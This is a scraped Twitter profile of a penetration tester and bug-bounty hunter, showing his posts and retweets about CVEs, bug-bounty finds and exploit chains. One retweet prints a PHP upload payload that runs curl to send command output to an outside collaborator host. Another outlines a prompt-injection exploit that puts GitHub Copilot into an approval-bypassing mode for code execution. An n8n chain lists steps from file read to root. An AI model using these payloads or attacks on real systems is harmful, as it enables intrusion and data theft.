Ugur Cihan Koc (@uceka_) 's Twitter Profile
Ugur Cihan Koc

@uceka_

AdemOglu 🇹🇷 | PenetrationTester | EthicalHacker | BugBountyHunter | oswe | osce | oscp | oswp @cobalt_io @hacker0x01 @bugcrowd

ID: 552107652

http://www.uceka.com

12-04-2012 17:25:09

273 Tweet

804 Followers

1.1K Following

PT SWARM (@ptswarm) 's Twitter Profile Photo

💥 New attack! Our researcher Arseniy Sharoglazov discovered a PHP Arbitrary Object Instantiation with no user-defined classes. It was turned into RCE! Read the research: swarm.ptsecurity.com/exploiting-arb…

Ugur Cihan Koc (@uceka_) 's Twitter Profile Photo

In the Finance Sector Focused Cyber Drill & CTF competition, my teammates Onur Er and Hüseyin Ulutürk and I took 1st place on behalf of QNB Finansbank.

Intigriti (@intigriti) 's Twitter Profile Photo

Did you know a new JWT Attack was recently published?! 🤯️ CVE-2023-30845 bypasses JWT checking by using the X-HTTP-Method-Override request header!

Ugur Cihan Koc (@uceka_) 's Twitter Profile Photo

GraphQL DOS Cases uceka.com/2023/12/13/gra…

- Introspection-based Circular
- Field Duplication
- Directives Overloading
- Alias Overloading

Shreyas R Gujar 🇮🇳 (@shreyasrx) 's Twitter Profile Photo

OOB RCE > Unauth + Unrestricted File Upload API Uploading files possible, but paths redirect to default page, blocking direct execution. Payload: <?php system('curl burp.collabo.com -d "data=$(id)"') ?> #bugbounty #bugbountytips #CyberSecurity

Samuel (@saamux) 's Twitter Profile Photo

Yay, today was a good day, after reading JS files for 10 hours and with several chains I found an ATO without interaction bypassing the client and server side encryption mechanism. I recommend this article, it helped me a lot, the bug was triaged :). infosecwriteups.com/bypassing-asym…

Lupin (@0xlupin) 's Twitter Profile Photo

Today I received a $12,000 bounty using the Sandwich Attack ! 🤑 The vulnerability allowed me to enumerate the API Keys of other users 🤯 How did I do that ? Well the API key was a UUIDv1. If you are not familiar with UUIDv1s you need to know that they are constructed in 6

Mobile Security (@mobilesecurity_) 's Twitter Profile Photo

Deobfuscating Android ARM64 strings with Ghidra: Emulating, Patching, and Automating #MobileSecurity #AndroidSecurity by Jeroen Beckers and NVISO Labs blog.nviso.eu/2024/01/15/deo…

Ian Carroll (@iangcarroll) 's Twitter Profile Photo

In April, Sam Curry and I discovered a way to bypass airport security via SQL injection in a database of crewmembers. Unfortunately, DHS ghosted us after we disclosed the issue, and the TSA attempted to cover up what we found. Here is our writeup: ian.sh/tsa

0xor0ne (@0xor0ne) 's Twitter Profile Photo

Analysis of backdoored SSH (CVE-2024-6387) exploits santandersecurityresearch.github.io/blog/sshing_th… Credits Santander's security team #ssh #infosec

Johann Rehberger (@wunderwuzzi23) 's Twitter Profile Photo

💥 Remote Code Execution in GitHub Copilot (CVE-2025-53773) 👉 Prompt injection exploit writes to Copilot config file and puts it into YOLO mode, then we get immediate RCE 🔥 Bypasses all user approvals 🛡️ Patch is out today. Update before someone else does it for you

pyn3rd (@pyn3rd) 's Twitter Profile Photo

#CVE-2025-55182: RSC RCE — It functions as an in-memory webshell backdoor, offering a significantly more covert foothold. Please verify this again on your own endpoint.

¯\_(ツ)_/¯ (@chocapikk_) 's Twitter Profile Photo

CVE-2026-21858 + CVE-2025-68613: n8n Ni8mare - Full Chain Exploit

Unauthenticated to Root RCE:
- LFI via Content-Type confusion
- Read /proc/self/environ to find HOME
- Steal encryption key + database
- Forge admin JWT token
- Expression injection sandbox bypass
- RCE as root
Youssef Sammouda (sam0) (@samm0uda) 's Twitter Profile Photo

$312,500 worth of stored/reflected XSS vulnerabilities in Meta’s Conversions API Gateway allowed Javascript code to run on any Facebook domain and millions of third-party websites. The flaw enabled zero-click Facebook account takeover and more: ysamm.com/uncategorized/…

Ayet Hadis Söz (@ayet1hadis) 's Twitter Profile Photo

"Just as a trial comes to you suddenly, a deliverance will also come suddenly. * Put your trust in Allah and do not fall into despair."